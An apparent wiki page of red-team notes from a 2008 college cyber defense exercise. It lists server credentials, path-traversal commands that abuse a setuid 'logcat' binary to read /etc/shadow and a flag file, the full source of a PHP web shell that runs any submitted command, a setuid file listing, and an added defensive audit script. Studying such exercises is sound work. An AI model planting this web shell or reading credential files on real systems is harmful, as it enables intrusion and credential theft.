C3DCF08 Webserver information

From Information Assurance Center Wiki


2008 Community College CDC Red

Copy of webserver: 49.10.100.100; root/toor

Created regular user: blah/blah

Notable attacks

On webservers: log in as cdc

logcat ../../etc/shadow

logcat ../www/8_web.flag.gpg > out

mv out public_html/

flag available at <www>/~cdc/out

shell.php code

<?php
$register_globals = (bool) ini_get('register_globals');
if ($register_globals) $svr = getenv('SERVER_NAME');
else $svr = $_SERVER['SERVER_NAME'];
?>
<html>
<head>
<title>Published at scripts.tropicalpcsolutions.com</title>
</head>
<body>
<form enctype="multipart/form-data" method="POST">
<br>
[webshell@<?php echo $svr ?> /]#
  <input type="text" name="cmd" value="">
  <input type="submit" value="Enter">
</form>
<br>
<hr width="75%" align="left">
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd']; if($cmd) {
passthru($cmd,$last_line);
echo '<pre>'; echo $last_line;  echo '</pre>';
}
?>

setuid files

find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-lock
-rwxr-sr-x 1 mlocate 30260 2008-11-18 17:05 /usr/bin/mlocate
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-unlock
-rwxr-sr-x 1 utmp 336452 2008-11-18 17:05 /usr/bin/screen
-rwsr-xr-x 1 root 32028 2008-11-18 17:05 /usr/bin/chfn
-rwsr-sr-x 1 root 9236 2008-11-18 17:05 /usr/bin/sudoku
-rwsr-xr-x 1 root 32988 2008-11-18 17:05 /usr/bin/passwd
-rwsr-sr-x 1 mail 72316 2008-11-18 17:05 /usr/bin/procmail
-rwsr-xr-x 1 root 47908 2008-11-18 17:05 /usr/bin/mtr
-rwsr-xr-x 1 root 26728 2008-11-18 17:05 /usr/bin/newgrp
-rwxr-sr-x 1 ssh 79860 2008-11-18 17:05 /usr/bin/ssh-agent
-rwxr-sr-x 1 shadow 18472 2008-11-18 17:05 /usr/bin/expiry
-rwsr-xr-x 1 root 27548 2008-11-18 17:05 /usr/bin/chsh
-rwsr-xr-x 2 root 115136 2008-11-18 17:05 /usr/bin/sudoedit
-rwsr-sr-x 1 root 9240 2008-11-18 17:05 /usr/bin/logcat
-rwsr-xr-x 1 root 11048 2008-11-18 17:05 /usr/bin/arping
-rwxr-sr-x 1 tty 8192 2008-11-18 17:05 /usr/bin/bsd-write
-rwxr-sr-x 1 mail 12832 2008-11-18 17:05 /usr/bin/lockfile
-rwsr-xr-x 1 root 12296 2008-11-18 17:05 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 daemon 43172 2008-11-18 17:05 /usr/bin/at
-rwxr-sr-x 1 shadow 49276 2008-11-18 17:05 /usr/bin/chage
-rwxr-sr-x 1 crontab 31632 2008-11-18 17:05 /usr/bin/crontab
-rwsr-xr-x 2 root 115136 2008-11-18 17:05 /usr/bin/sudo
-rwxr-sr-x 1 tty 13808 2008-11-18 17:05 /usr/bin/wall
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-touchlock
-rwxr-sr-x 1 mail 14200 2008-11-18 17:05 /usr/bin/dotlockfile
-rwsr-sr-x 1 root 786176 2008-11-18 17:05 /usr/bin/nmap
-rwsr-xr-x 1 root 45468 2008-11-18 17:05 /usr/bin/gpasswd
-rwsr-sr-x 1 root 9241 2008-11-18 17:05 /usr/bin/logtail   -- tried ..
-rwsr-xr-x 1 root 5492 2008-10-02 16:58 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root 183156 2008-10-13 13:50 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root 9620 2008-09-29 05:40 /usr/lib/pt_chown
-rwxr-sr-x 1 smmsp 68436 2008-05-20 02:21 /usr/lib/sm.bin/mailstats
-rwxr-sr-x 1 smmsp 824600 2008-05-20 02:21 /usr/lib/sm.bin/sendmail
-rwsr-xr-- 1 dip 273064 2008-10-15 20:51 /usr/sbin/pppd
-rwsr-xr-x 1 root 9460 2008-05-20 02:21 /usr/sbin/sensible-mda
-rwsr-sr-x 1 libuuid 13796 2008-10-13 08:09 /usr/sbin/uuidd
find: `/proc/5130/task/5130/fd/5': No such file or directory
find: `/proc/5130/task/5130/fdinfo/5': No such file or directory
find: `/proc/5130/fd/5': No such file or directory
find: `/proc/5130/fdinfo/5': No such file or directory
-rwsr-xr-x 1 root 22064 2008-09-25 11:06 /bin/fusermount
-rwsr-xr-x 1 root 92584 2008-09-25 08:08 /bin/mount
-rwsr-xr-x 1 root 26684 2007-12-10 11:33 /bin/ping6
-rwsr-xr-x 1 root 31012 2008-06-09 13:10 /bin/su
-rwsr-xr-x 1 root 71556 2008-09-25 08:08 /bin/umount
-rwsr-xr-x 1 root 30856 2007-12-10 11:33 /bin/ping
-rwsr-xr-- 1 messagebus 42740 2008-10-07 09:23 /lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root 26540 2008-10-10 09:12 /sbin/mount.cifs
-rwxr-sr-x 1 shadow 30272 2008-10-15 23:36 /sbin/unix_chkpwd
-rwsr-xr-x 1 root 9836 2008-11-18 17:05 /sbin/umount.cifs
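
A defender can run the same listing through a baseline comparison so that binaries such as logcat stand out during hardening. The script below is an added example, not part of the original notes; the BASELINE allowlist and the function names are assumptions, and the sample lines are copied from the listing above.

```shell
#!/bin/sh
# Assumed baseline of setuid/setgid paths expected on the image.
# Illustrative only: build the real list from a known-good install.
BASELINE='/usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/sudo /bin/su /bin/ping /usr/bin/mail-lock'

# Reads `ls -lg` lines on stdin (mode links group size date time path) and
# prints "<bits> <group> <path>" for each setuid/setgid file not in BASELINE.
# `ls -lg` omits the owner column, so the name in field 3 is the group;
# use `ls -l` when the owner is needed.
audit_setuid() {
    awk -v baseline="$BASELINE" '
        BEGIN { n = split(baseline, b, " "); for (i = 1; i <= n; i++) ok[b[i]] = 1 }
        $1 !~ /^-/ { next }    # skip the "find: ... No such file" noise from /proc
        {
            bits = ""
            if (substr($1, 4, 1) ~ /[sS]/) bits = bits "suid"
            if (substr($1, 7, 1) ~ /[sS]/) bits = bits (bits == "" ? "" : "+") "sgid"
            # Field 7 is the path; trailing annotations after it are ignored.
            if (bits != "" && !($7 in ok)) print bits, $3, $7
        }'
}

# Sample input: lines taken from the listing on this page.
sample_listing() {
    cat <<'EOF'
-rwxr-sr-x 3 mail 9812 2008-11-18 17:05 /usr/bin/mail-lock
-rwsr-sr-x 1 root 9236 2008-11-18 17:05 /usr/bin/sudoku
-rwsr-xr-x 1 root 32988 2008-11-18 17:05 /usr/bin/passwd
-rwsr-sr-x 1 root 9240 2008-11-18 17:05 /usr/bin/logcat
-rwsr-sr-x 1 root 786176 2008-11-18 17:05 /usr/bin/nmap
-rwsr-sr-x 1 root 9241 2008-11-18 17:05 /usr/bin/logtail   -- tried ..
find: `/proc/5130/fd/5': No such file or directory
-rwsr-xr-x 1 root 31012 2008-06-09 13:10 /bin/su
EOF
}

sample_listing | audit_setuid
```

On a live host, pipe the `find` command above into `audit_setuid` instead of `sample_listing`.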